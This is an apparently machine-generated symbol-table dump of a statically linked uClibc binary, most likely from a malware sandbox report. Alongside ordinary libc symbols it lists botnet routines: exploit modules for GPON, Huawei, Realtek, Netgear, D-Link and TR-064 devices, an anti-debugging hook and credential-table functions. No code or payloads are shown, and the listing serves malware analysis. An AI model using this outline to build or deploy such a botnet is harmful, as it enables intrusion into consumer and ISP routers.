                  __GI___glibc_strerror_r.symtab0x40b27414FUNC<unknown>HIDDEN2
                  __GI___h_errno_location.symtab0x40e7ac6FUNC<unknown>HIDDEN2
                  __GI___libc_fcntl.symtab0x40934c100FUNC<unknown>HIDDEN2
                  __GI___libc_lseek.symtab0x40e4e445FUNC<unknown>HIDDEN2
                  __GI___libc_open.symtab0x409514106FUNC<unknown>HIDDEN2
                  __GI___uClibc_fini.symtab0x40dde870FUNC<unknown>HIDDEN2
                  __GI___uClibc_init.symtab0x40de6767FUNC<unknown>HIDDEN2
                  __GI___xpg_strerror_r.symtab0x40b284194FUNC<unknown>HIDDEN2
                  __GI__exit.symtab0x40e1dc42FUNC<unknown>HIDDEN2
                  __GI_abort.symtab0x40d178276FUNC<unknown>HIDDEN2
                  __GI_atoi.symtab0x40d7ac18FUNC<unknown>HIDDEN2
                  __GI_bind.symtab0x40bd4843FUNC<unknown>HIDDEN2
                  __GI_brk.symtab0x41028443FUNC<unknown>HIDDEN2
                  __GI_clock_getres.symtab0x40e20841FUNC<unknown>HIDDEN2
                  __GI_close.symtab0x4093b041FUNC<unknown>HIDDEN2
                  __GI_closedir.symtab0x409730116FUNC<unknown>HIDDEN2
                  __GI_connect.symtab0x40bd7443FUNC<unknown>HIDDEN2
                  __GI_dup2.symtab0x4093dc44FUNC<unknown>HIDDEN2
                  __GI_errno.symtab0x51a93c4OBJECT<unknown>HIDDEN10
                  __GI_execl.symtab0x40d994287FUNC<unknown>HIDDEN2
                  __GI_execve.symtab0x40e23438FUNC<unknown>HIDDEN2
                  __GI_exit.symtab0x40d93892FUNC<unknown>HIDDEN2
                  __GI_fclose.symtab0x4102f4259FUNC<unknown>HIDDEN2
                  __GI_fcntl.symtab0x40934c100FUNC<unknown>HIDDEN2
                  __GI_fcntl64.symtab0x40934c100FUNC<unknown>HIDDEN2
                  __GI_fflush_unlocked.symtab0x410900329FUNC<unknown>HIDDEN2
                  __GI_fgetc_unlocked.symtab0x411394222FUNC<unknown>HIDDEN2
                  __GI_fgets.symtab0x4107b8109FUNC<unknown>HIDDEN2
                  __GI_fgets_unlocked.symtab0x410a4c116FUNC<unknown>HIDDEN2
                  __GI_fopen.symtab0x4103f810FUNC<unknown>HIDDEN2
                  __GI_fork.symtab0x40940838FUNC<unknown>HIDDEN2
                  __GI_fputs_unlocked.symtab0x40ab5056FUNC<unknown>HIDDEN2
                  __GI_fseek.symtab0x4104045FUNC<unknown>HIDDEN2
                  __GI_fseeko64.symtab0x41040c218FUNC<unknown>HIDDEN2
                  __GI_fstat.symtab0x40e25c82FUNC<unknown>HIDDEN2
                  __GI_fstat64.symtab0x40e25c82FUNC<unknown>HIDDEN2
                  __GI_fwrite_unlocked.symtab0x40ab88134FUNC<unknown>HIDDEN2
                  __GI_getc_unlocked.symtab0x411394222FUNC<unknown>HIDDEN2
                  __GI_getdtablesize.symtab0x40e3dc35FUNC<unknown>HIDDEN2
                  __GI_getegid.symtab0x40e40038FUNC<unknown>HIDDEN2
                  __GI_geteuid.symtab0x40e42838FUNC<unknown>HIDDEN2
                  __GI_getgid.symtab0x40e45038FUNC<unknown>HIDDEN2
                  __GI_gethostbyname.symtab0x40b98c53FUNC<unknown>HIDDEN2
                  __GI_gethostbyname_r.symtab0x40b9c4897FUNC<unknown>HIDDEN2
                  __GI_getpagesize.symtab0x40e47819FUNC<unknown>HIDDEN2
                  __GI_getpid.symtab0x40943038FUNC<unknown>HIDDEN2
                  __GI_getrlimit.symtab0x40e48c40FUNC<unknown>HIDDEN2
                  __GI_getsockname.symtab0x40bda041FUNC<unknown>HIDDEN2
                  __GI_getuid.symtab0x40e4b438FUNC<unknown>HIDDEN2
                  __GI_h_errno.symtab0x51a9404OBJECT<unknown>HIDDEN10
                  __GI_inet_addr.symtab0x410d7028FUNC<unknown>HIDDEN2
                  __GI_inet_aton.symtab0x40f7fc137FUNC<unknown>HIDDEN2
                  __GI_inet_ntop.symtab0x40b77c527FUNC<unknown>HIDDEN2
                  __GI_inet_pton.symtab0x40b477493FUNC<unknown>HIDDEN2
                  __GI_initstate_r.symtab0x40d5a3185FUNC<unknown>HIDDEN2
                  __GI_ioctl.symtab0x409480104FUNC<unknown>HIDDEN2
                  __GI_isatty.symtab0x40b36425FUNC<unknown>HIDDEN2
                  __GI_kill.symtab0x4094e844FUNC<unknown>HIDDEN2
                  __GI_listen.symtab0x40be0044FUNC<unknown>HIDDEN2
                  __GI_lseek.symtab0x40e4e445FUNC<unknown>HIDDEN2
                  __GI_lseek64.symtab0x40e4dc5FUNC<unknown>HIDDEN2
                  __GI_memchr.symtab0x40f538240FUNC<unknown>HIDDEN2
                  __GI_memcpy.symtab0x40ac10102FUNC<unknown>HIDDEN2
                  __GI_memmove.symtab0x40aec4734FUNC<unknown>HIDDEN2
                  __GI_mempcpy.symtab0x40f25090FUNC<unknown>HIDDEN2
                  __GI_memrchr.symtab0x40f628237FUNC<unknown>HIDDEN2
                  __GI_memset.symtab0x40ac80210FUNC<unknown>HIDDEN2
                  __GI_mmap.symtab0x40e19448FUNC<unknown>HIDDEN2
                  __GI_mremap.symtab0x40e51442FUNC<unknown>HIDDEN2
                  __GI_munmap.symtab0x40e54038FUNC<unknown>HIDDEN2
                  __GI_nanosleep.symtab0x40e56838FUNC<unknown>HIDDEN2
                  __GI_open.symtab0x409514106FUNC<unknown>HIDDEN2
                  __GI_opendir.symtab0x4097a4243FUNC<unknown>HIDDEN2
                  __GI_poll.symtab0x4102c841FUNC<unknown>HIDDEN2
                  __GI_printf.symtab0x409960157FUNC<unknown>HIDDEN2
                  __GI_raise.symtab0x41025818FUNC<unknown>HIDDEN2
                  __GI_random.symtab0x40d29872FUNC<unknown>HIDDEN2
                  __GI_random_r.symtab0x40d4a090FUNC<unknown>HIDDEN2
                  __GI_rawmemchr.symtab0x410c00190FUNC<unknown>HIDDEN2
                  __GI_read.symtab0x4095b839FUNC<unknown>HIDDEN2
                  __GI_readdir.symtab0x409898143FUNC<unknown>HIDDEN2
                  __GI_readlink.symtab0x4095e039FUNC<unknown>HIDDEN2
                  __GI_recv.symtab0x40be2c11FUNC<unknown>HIDDEN2
                  __GI_recvfrom.symtab0x40be3845FUNC<unknown>HIDDEN2
                  __GI_sbrk.symtab0x40e59074FUNC<unknown>HIDDEN2
                  __GI_select.symtab0x40960844FUNC<unknown>HIDDEN2
                  __GI_send.symtab0x40be6811FUNC<unknown>HIDDEN2
                  __GI_sendto.symtab0x40be7448FUNC<unknown>HIDDEN2
                  __GI_setsid.symtab0x40963438FUNC<unknown>HIDDEN2
                  __GI_setsockopt.symtab0x40bea453FUNC<unknown>HIDDEN2
                  __GI_setstate_r.symtab0x40d3f8168FUNC<unknown>HIDDEN2
                  __GI_sigaction.symtab0x40e09d247FUNC<unknown>HIDDEN2
                  __GI_sigaddset.symtab0x40bf0c35FUNC<unknown>HIDDEN2
                  __GI_sigemptyset.symtab0x40bf3020FUNC<unknown>HIDDEN2
                  __GI_signal.symtab0x40bf44168FUNC<unknown>HIDDEN2
                  __GI_sigprocmask.symtab0x40965c85FUNC<unknown>HIDDEN2
                  __GI_sleep.symtab0x40dab4415FUNC<unknown>HIDDEN2
                  __GI_snprintf.symtab0x409a00137FUNC<unknown>HIDDEN2
                  __GI_socket.symtab0x40bedc47FUNC<unknown>HIDDEN2
                  __GI_sprintf.symtab0x409a8c149FUNC<unknown>HIDDEN2
                  __GI_srandom_r.symtab0x40d4fa169FUNC<unknown>HIDDEN2
                  __GI_strcasecmp.symtab0x41147448FUNC<unknown>HIDDEN2
                  __GI_strchr.symtab0x40f2b0417FUNC<unknown>HIDDEN2
                  __GI_strcmp.symtab0x410ac033FUNC<unknown>HIDDEN2
                  __GI_strcoll.symtab0x410ac033FUNC<unknown>HIDDEN2
                  __GI_strcpy.symtab0x40f460213FUNC<unknown>HIDDEN2
                  __GI_strcspn.symtab0x40ad58135FUNC<unknown>HIDDEN2
                  __GI_strdup.symtab0x410d3854FUNC<unknown>HIDDEN2
                  __GI_strlen.symtab0x40ade0225FUNC<unknown>HIDDEN2
                  __GI_strncat.symtab0x410cc0119FUNC<unknown>HIDDEN2
                  __GI_strncpy.symtab0x40f718131FUNC<unknown>HIDDEN2
                  __GI_strnlen.symtab0x40b1a4206FUNC<unknown>HIDDEN2
                  __GI_strpbrk.symtab0x410ae8140FUNC<unknown>HIDDEN2
                  __GI_strspn.symtab0x410b78135FUNC<unknown>HIDDEN2
                  __GI_strtok.symtab0x40b35810FUNC<unknown>HIDDEN2
                  __GI_strtok_r.symtab0x40f79c94FUNC<unknown>HIDDEN2
                  __GI_strtol.symtab0x40d7c010FUNC<unknown>HIDDEN2
                  __GI_strtoll.symtab0x40d7c010FUNC<unknown>HIDDEN2
                  __GI_sysconf.symtab0x40dc54351FUNC<unknown>HIDDEN2
                  __GI_tcgetattr.symtab0x40b380110FUNC<unknown>HIDDEN2
                  __GI_time.symtab0x4096b439FUNC<unknown>HIDDEN2
                  __GI_times.symtab0x40e5dc39FUNC<unknown>HIDDEN2
                  __GI_tolower.symtab0x40e78c30FUNC<unknown>HIDDEN2
                  __GI_unlink.symtab0x4096dc38FUNC<unknown>HIDDEN2
                  __GI_vfork.symtab0x40e1c421FUNC<unknown>HIDDEN2
                  __GI_vfprintf.symtab0x409d18143FUNC<unknown>HIDDEN2
                  __GI_vsnprintf.symtab0x409b24199FUNC<unknown>HIDDEN2
                  __GI_wait4.symtab0x40e60447FUNC<unknown>HIDDEN2
                  __GI_wcrtomb.symtab0x40e7b468FUNC<unknown>HIDDEN2
                  __GI_wcsnrtombs.symtab0x40e808140FUNC<unknown>HIDDEN2
                  __GI_wcsrtombs.symtab0x40e7f815FUNC<unknown>HIDDEN2
                  __GI_write.symtab0x40970442FUNC<unknown>HIDDEN2
                  __JCR_END__.symtab0x5180200OBJECT<unknown>DEFAULT8
                  __JCR_LIST__.symtab0x5180200OBJECT<unknown>DEFAULT8
                  __app_fini.symtab0x51a9288OBJECT<unknown>HIDDEN10
                  __atexit_lock.symtab0x5184e040OBJECT<unknown>DEFAULT9
                  __bsd_signal.symtab0x40bf44168FUNC<unknown>HIDDEN2
                  __bss_start.symtab0x5185680NOTYPE<unknown>DEFAULTSHN_ABS
                  __check_one_fd.symtab0x40de3253FUNC<unknown>DEFAULT2
                  __ctype_b.symtab0x5185188OBJECT<unknown>DEFAULT9
                  __ctype_tolower.symtab0x5185288OBJECT<unknown>DEFAULT9
                  __curbrk.symtab0x51a9908OBJECT<unknown>HIDDEN10
                  __data_start.symtab0x5180500NOTYPE<unknown>DEFAULT9
                  __decode_answer.symtab0x410f38242FUNC<unknown>HIDDEN2
                  __decode_dotted.symtab0x411544246FUNC<unknown>HIDDEN2
                  __decode_header.symtab0x410e30161FUNC<unknown>HIDDEN2
                  __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __dns_lookup.symtab0x40f8881862FUNC<unknown>HIDDEN2
                  __do_global_ctors_aux.symtab0x4117400FUNC<unknown>DEFAULT2
                  __do_global_dtors_aux.symtab0x4001000FUNC<unknown>DEFAULT2
                  __dso_handle.symtab0x5180400OBJECT<unknown>HIDDEN9
                  __encode_dotted.symtab0x4114a4160FUNC<unknown>HIDDEN2
                  __encode_header.symtab0x410d8c163FUNC<unknown>HIDDEN2
                  __encode_question.symtab0x410ed480FUNC<unknown>HIDDEN2
                  __environ.symtab0x51a9188OBJECT<unknown>DEFAULT10
                  __errno_location.symtab0x4099286FUNC<unknown>DEFAULT2
                  __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __exit_cleanup.symtab0x51a9088OBJECT<unknown>HIDDEN10
                  __fgetc_unlocked.symtab0x411394222FUNC<unknown>DEFAULT2
                  __fini_array_end.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                  __fini_array_start.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                  __get_hosts_byname_r.symtab0x41022848FUNC<unknown>HIDDEN2
                  __getdents.symtab0x40e2b0300FUNC<unknown>HIDDEN2
                  __getdents64.symtab0x40e2b0300FUNC<unknown>HIDDEN2
                  __getpagesize.symtab0x40e47819FUNC<unknown>DEFAULT2
                  __glibc_strerror_r.symtab0x40b27414FUNC<unknown>DEFAULT2
                  __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __h_errno_location.symtab0x40e7ac6FUNC<unknown>DEFAULT2
                  __h_errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __init_array_end.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                  __init_array_start.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                  __length_dotted.symtab0x41163c59FUNC<unknown>HIDDEN2
                  __length_question.symtab0x410f2419FUNC<unknown>HIDDEN2
                  __libc_close.symtab0x4093b041FUNC<unknown>DEFAULT2
                  __libc_connect.symtab0x40bd7443FUNC<unknown>DEFAULT2
                  __libc_creat.symtab0x40957e14FUNC<unknown>DEFAULT2
                  __libc_fcntl.symtab0x40934c100FUNC<unknown>DEFAULT2
                  __libc_fcntl64.symtab0x40934c100FUNC<unknown>DEFAULT2
                  __libc_fork.symtab0x40940838FUNC<unknown>DEFAULT2
                  __libc_getpid.symtab0x40943038FUNC<unknown>DEFAULT2
                  __libc_lseek.symtab0x40e4e445FUNC<unknown>DEFAULT2
                  __libc_lseek64.symtab0x40e4dc5FUNC<unknown>DEFAULT2
                  __libc_nanosleep.symtab0x40e56838FUNC<unknown>DEFAULT2
                  __libc_open.symtab0x409514106FUNC<unknown>DEFAULT2
                  __libc_poll.symtab0x4102c841FUNC<unknown>DEFAULT2
                  __libc_read.symtab0x4095b839FUNC<unknown>DEFAULT2
                  __libc_recv.symtab0x40be2c11FUNC<unknown>DEFAULT2
                  __libc_recvfrom.symtab0x40be3845FUNC<unknown>DEFAULT2
                  __libc_select.symtab0x40960844FUNC<unknown>DEFAULT2
                  __libc_send.symtab0x40be6811FUNC<unknown>DEFAULT2
                  __libc_sendto.symtab0x40be7448FUNC<unknown>DEFAULT2
                  __libc_sigaction.symtab0x40e09d247FUNC<unknown>DEFAULT2
                  __libc_stack_end.symtab0x51a9108OBJECT<unknown>DEFAULT10
                  __libc_system.symtab0x40d65c335FUNC<unknown>DEFAULT2
                  __libc_write.symtab0x40970442FUNC<unknown>DEFAULT2
                  __malloc_consolidate.symtab0x40cdfd410FUNC<unknown>HIDDEN2
                  __malloc_largebin_index.symtab0x40c04896FUNC<unknown>DEFAULT2
                  __malloc_lock.symtab0x51836040OBJECT<unknown>DEFAULT9
                  __malloc_state.symtab0x51ade01752OBJECT<unknown>DEFAULT10
                  __malloc_trim.symtab0x40cd64153FUNC<unknown>DEFAULT2
                  __nameserver.symtab0x51b4e024OBJECT<unknown>HIDDEN10
                  __nameservers.symtab0x51b4f84OBJECT<unknown>HIDDEN10
                  __open_etc_hosts.symtab0x41102c42FUNC<unknown>HIDDEN2
                  __open_nameservers.symtab0x40ffd0597FUNC<unknown>HIDDEN2
                  __pagesize.symtab0x51a9208OBJECT<unknown>DEFAULT10
                  __preinit_array_end.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                  __preinit_array_start.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                  __pthread_initialize_minimal.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __pthread_mutex_init.symtab0x40de2e3FUNC<unknown>DEFAULT2
                  __pthread_mutex_lock.symtab0x40de2e3FUNC<unknown>DEFAULT2
                  __pthread_mutex_trylock.symtab0x40de2e3FUNC<unknown>DEFAULT2
                  __pthread_mutex_unlock.symtab0x40de2e3FUNC<unknown>DEFAULT2
                  __pthread_return_0.symtab0x40de2e3FUNC<unknown>DEFAULT2
                  __pthread_return_void.symtab0x40de311FUNC<unknown>DEFAULT2
                  __raise.symtab0x41025818FUNC<unknown>HIDDEN2
                  __read_etc_hosts_r.symtab0x411056830FUNC<unknown>HIDDEN2
                  __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __resolv_lock.symtab0x51854040OBJECT<unknown>DEFAULT9
                  __restore_rt.symtab0x40e0940NOTYPE<unknown>DEFAULT2
                  __rtld_fini.symtab0x51a9308OBJECT<unknown>HIDDEN10
                  __searchdomain.symtab0x51b4c032OBJECT<unknown>HIDDEN10
                  __searchdomains.symtab0x51b4fc4OBJECT<unknown>HIDDEN10
                  __sigaddset.symtab0x40c00c28FUNC<unknown>DEFAULT2
                  __sigdelset.symtab0x40c02830FUNC<unknown>DEFAULT2
                  __sigismember.symtab0x40bfec32FUNC<unknown>DEFAULT2
                  __stdin.symtab0x5181388OBJECT<unknown>DEFAULT9
                  __stdio_READ.symtab0x41167858FUNC<unknown>HIDDEN2
                  __stdio_WRITE.symtab0x40e894147FUNC<unknown>HIDDEN2
                  __stdio_adjust_position.symtab0x4104e8133FUNC<unknown>HIDDEN2
                  __stdio_fwrite.symtab0x40e928259FUNC<unknown>HIDDEN2
                  __stdio_init_mutex.symtab0x409c5715FUNC<unknown>HIDDEN2
                  __stdio_mutex_initializer.4280.symtab0x41644040OBJECT<unknown>DEFAULT4
                  __stdio_rfill.symtab0x4116b437FUNC<unknown>HIDDEN2
                  __stdio_seek.symtab0x41079831FUNC<unknown>HIDDEN2
                  __stdio_trans2r_o.symtab0x4116dc90FUNC<unknown>HIDDEN2
                  __stdio_trans2w_o.symtab0x40ea2c148FUNC<unknown>HIDDEN2
                  __stdio_wcommit.symtab0x409cf039FUNC<unknown>HIDDEN2
                  __stdout.symtab0x5181408OBJECT<unknown>DEFAULT9
                  __syscall_error.symtab0x4102b022FUNC<unknown>HIDDEN2
                  __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __uClibc_fini.symtab0x40dde870FUNC<unknown>DEFAULT2
                  __uClibc_init.symtab0x40de6767FUNC<unknown>DEFAULT2
                  __uClibc_main.symtab0x40deaa489FUNC<unknown>DEFAULT2
                  __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __uclibc_progname.symtab0x5185088OBJECT<unknown>HIDDEN9
                  __vfork.symtab0x40e1c421FUNC<unknown>HIDDEN2
                  __xpg_strerror_r.symtab0x40b284194FUNC<unknown>DEFAULT2
                  __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __xstat64_conv.symtab0x40e634172FUNC<unknown>HIDDEN2
                  __xstat_conv.symtab0x40e6e0172FUNC<unknown>HIDDEN2
                  _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _charpad.symtab0x409da868FUNC<unknown>DEFAULT2
                  _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _dl_aux_init.symtab0x41026c23FUNC<unknown>DEFAULT2
                  _dl_phdr.symtab0x51b5008OBJECT<unknown>DEFAULT10
                  _dl_phnum.symtab0x51b5088OBJECT<unknown>DEFAULT10
                  _edata.symtab0x5185680NOTYPE<unknown>DEFAULTSHN_ABS
                  _end.symtab0x51b5100NOTYPE<unknown>DEFAULTSHN_ABS
                  _errno.symtab0x51a93c4OBJECT<unknown>DEFAULT10
                  _exit.symtab0x40e1dc42FUNC<unknown>DEFAULT2
                  _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _fini.symtab0x4117785FUNC<unknown>DEFAULT3
                  _fixed_buffers.symtab0x5186c08192OBJECT<unknown>DEFAULT10
                  _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _fp_out_narrow.symtab0x409dec120FUNC<unknown>DEFAULT2
                  _fpmaxtostr.symtab0x40ec041608FUNC<unknown>HIDDEN2
                  _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _h_errno.symtab0x51a9404OBJECT<unknown>DEFAULT10
                  _init.symtab0x4000e85FUNC<unknown>DEFAULT1
                  _load_inttype.symtab0x40eac085FUNC<unknown>HIDDEN2
                  _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _ppfs_init.symtab0x40a4a0114FUNC<unknown>HIDDEN2
                  _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _ppfs_parsespec.symtab0x40a7521022FUNC<unknown>HIDDEN2
                  _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _ppfs_prepargs.symtab0x40a51467FUNC<unknown>HIDDEN2
                  _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _ppfs_setargs.symtab0x40a558457FUNC<unknown>HIDDEN2
                  _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _promoted_size.symtab0x40a72446FUNC<unknown>DEFAULT2
                  _pthread_cleanup_pop_restore.symtab0x40de311FUNC<unknown>DEFAULT2
                  _pthread_cleanup_push_defer.symtab0x40de311FUNC<unknown>DEFAULT2
                  _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _sigintr.symtab0x51ad60128OBJECT<unknown>HIDDEN10
                  _start.symtab0x40019442FUNC<unknown>DEFAULT2
                  _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _stdio_fopen.symtab0x410570551FUNC<unknown>HIDDEN2
                  _stdio_init.symtab0x409bec107FUNC<unknown>HIDDEN2
                  _stdio_openlist.symtab0x5181488OBJECT<unknown>DEFAULT9
                  _stdio_openlist_add_lock.symtab0x51816040OBJECT<unknown>DEFAULT9
                  _stdio_openlist_dec_use.symtab0x410828216FUNC<unknown>DEFAULT2
                  _stdio_openlist_del_count.symtab0x5186a44OBJECT<unknown>DEFAULT10
                  _stdio_openlist_del_lock.symtab0x5181a040OBJECT<unknown>DEFAULT9
                  _stdio_openlist_use_count.symtab0x5186a04OBJECT<unknown>DEFAULT10
                  _stdio_streams.symtab0x5181e0384OBJECT<unknown>DEFAULT9
                  _stdio_term.symtab0x409c66135FUNC<unknown>HIDDEN2
                  _stdio_user_locking.symtab0x5181c84OBJECT<unknown>DEFAULT9
                  _stdlib_strto_l.symtab0x40d7cc362FUNC<unknown>HIDDEN2
                  _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _store_inttype.symtab0x40eb1846FUNC<unknown>HIDDEN2
                  _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _string_syserrmsgs.symtab0x4165802906OBJECT<unknown>HIDDEN4
                  _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _uintmaxtostr.symtab0x40eb48187FUNC<unknown>HIDDEN2
                  _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _vfprintf_internal.symtab0x409e641595FUNC<unknown>HIDDEN2
                  _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  abort.symtab0x40d178276FUNC<unknown>DEFAULT2
                  abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  add_auth_entry.symtab0x406850435FUNC<unknown>DEFAULT2
                  anti_gdb_entry.symtab0x40103012FUNC<unknown>DEFAULT2
                  atoi.symtab0x40d7ac18FUNC<unknown>DEFAULT2
                  atoi.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  auth_table.symtab0x5186888OBJECT<unknown>DEFAULT10
                  auth_table_len.symtab0x5186404OBJECT<unknown>DEFAULT10
                  auth_table_max_weight.symtab0x5186902OBJECT<unknown>DEFAULT10
                  bcopy.symtab0x40b34814FUNC<unknown>DEFAULT2
                  bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  been_there_done_that.symtab0x51a9004OBJECT<unknown>DEFAULT10
                  been_there_done_that.3160.symtab0x51a9384OBJECT<unknown>DEFAULT10
                  bind.symtab0x40bd4843FUNC<unknown>DEFAULT2
                  bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  brk.symtab0x41028443FUNC<unknown>DEFAULT2
                  brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  bsd_signal.symtab0x40bf44168FUNC<unknown>DEFAULT2
                  buf.5285.symtab0x51a6e0500OBJECT<unknown>DEFAULT10
                  calloc.symtab0x40c910248FUNC<unknown>DEFAULT2
                  calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  checksum_generic.symtab0x4001c068FUNC<unknown>DEFAULT2
                  checksum_tcpudp.symtab0x400210127FUNC<unknown>DEFAULT2
                  clock.symtab0x40993046FUNC<unknown>DEFAULT2
                  clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  clock_getres.symtab0x40e20841FUNC<unknown>DEFAULT2
                  clock_getres.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  close.symtab0x4093b041FUNC<unknown>DEFAULT2
                  close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  closedir.symtab0x409730116FUNC<unknown>DEFAULT2
                  closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  completed.2761.symtab0x5185801OBJECT<unknown>DEFAULT10
                  conn_table.symtab0x51a9f88OBJECT<unknown>DEFAULT10
                  connect.symtab0x40bd7443FUNC<unknown>DEFAULT2
                  connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  creat.symtab0x40957e14FUNC<unknown>DEFAULT2
                  crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  data_start.symtab0x5180500NOTYPE<unknown>DEFAULT9
                  decodea.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  dup2.symtab0x4093dc44FUNC<unknown>DEFAULT2
                  dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  environ.symtab0x51a9188OBJECT<unknown>DEFAULT10
                  errno.symtab0x51a93c4OBJECT<unknown>DEFAULT10
                  errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  execl.symtab0x40d994287FUNC<unknown>DEFAULT2
                  execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  execve.symtab0x40e23438FUNC<unknown>DEFAULT2
                  execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  exit.symtab0x40d93892FUNC<unknown>DEFAULT2
                  exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  exp10_table.symtab0x417c60208OBJECT<unknown>DEFAULT4
                  exploit_kill.symtab0x4029e016FUNC<unknown>DEFAULT2
                  exploit_pid.symtab0x51a9e44OBJECT<unknown>DEFAULT10
                  exploit_socket_crossweb.symtab0x403150151FUNC<unknown>DEFAULT2
                  exploit_socket_dlink.symtab0x402dd0183FUNC<unknown>DEFAULT2
                  exploit_socket_gpon80.symtab0x4050d0151FUNC<unknown>DEFAULT2
                  exploit_socket_gpon8080.symtab0x405760151FUNC<unknown>DEFAULT2
                  exploit_socket_hnap.symtab0x4032f0183FUNC<unknown>DEFAULT2
                  exploit_socket_huawei.symtab0x403710183FUNC<unknown>DEFAULT2
                  exploit_socket_jaws.symtab0x402f90183FUNC<unknown>DEFAULT2
                  exploit_socket_netgear.symtab0x403c60273FUNC<unknown>DEFAULT2
                  exploit_socket_r7064.symtab0x402c30151FUNC<unknown>DEFAULT2
                  exploit_socket_realtek.symtab0x404690301FUNC<unknown>DEFAULT2
                  exploit_socket_tr064.symtab0x4034b0346FUNC<unknown>DEFAULT2
                  exploit_socket_vacron.symtab0x402aa0140FUNC<unknown>DEFAULT2
                  exploit_worker.symtab0x405d20378FUNC<unknown>DEFAULT2
                  fake_time.symtab0x5186944OBJECT<unknown>DEFAULT10
                  fclose.symtab0x4102f4259FUNC<unknown>DEFAULT2
                  fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fcntl.symtab0x40934c100FUNC<unknown>DEFAULT2
                  fcntl64.symtab0x40934c100FUNC<unknown>DEFAULT2
                  fd_ctrl.symtab0x5180584OBJECT<unknown>DEFAULT9
                  fd_serv.symtab0x51805c4OBJECT<unknown>DEFAULT9
                  fflush_unlocked.symtab0x410900329FUNC<unknown>DEFAULT2
                  fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fgetc_unlocked.symtab0x411394222FUNC<unknown>DEFAULT2
                  fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fgets.symtab0x4107b8109FUNC<unknown>DEFAULT2
                  fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fgets_unlocked.symtab0x410a4c116FUNC<unknown>DEFAULT2
                  fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fmt.symtab0x417c4020OBJECT<unknown>DEFAULT4
                  fopen.symtab0x4103f810FUNC<unknown>DEFAULT2
